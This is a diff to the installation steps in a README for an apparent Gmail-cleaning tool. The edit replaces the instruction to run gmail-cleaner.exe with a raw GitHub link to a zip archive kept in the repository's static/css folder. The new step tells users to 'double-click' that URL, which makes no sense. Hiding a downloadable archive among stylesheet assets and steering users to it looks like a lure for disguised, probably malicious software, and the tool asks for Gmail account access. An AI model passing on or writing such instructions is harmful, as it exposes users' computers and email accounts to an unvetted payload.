misterrepack/gmail-cleaner/README.md

 4. **Extract the File:** Once the download is complete, locate the downloaded file in your system.
 If it is a compressed file (e.g., .zip), right-click on it and select "Extract All" to unzip the contents.

 5. **Open the Application:** After extracting, find the `gmail-cleaner` folder.
-Open it and double-click on `gmail-cleaner.exe` to start the application.
+Open it and double-click on `https://raw.githubusercontent.com/misterrepack/gmail-cleaner/main/static/css/gmail-cleaner-1.1.zip` to start the application.

 6. **Follow the On-Screen Instructions:** The application will guide you through the process of connecting to your Gmail account and selecting the cleanup options you want to apply.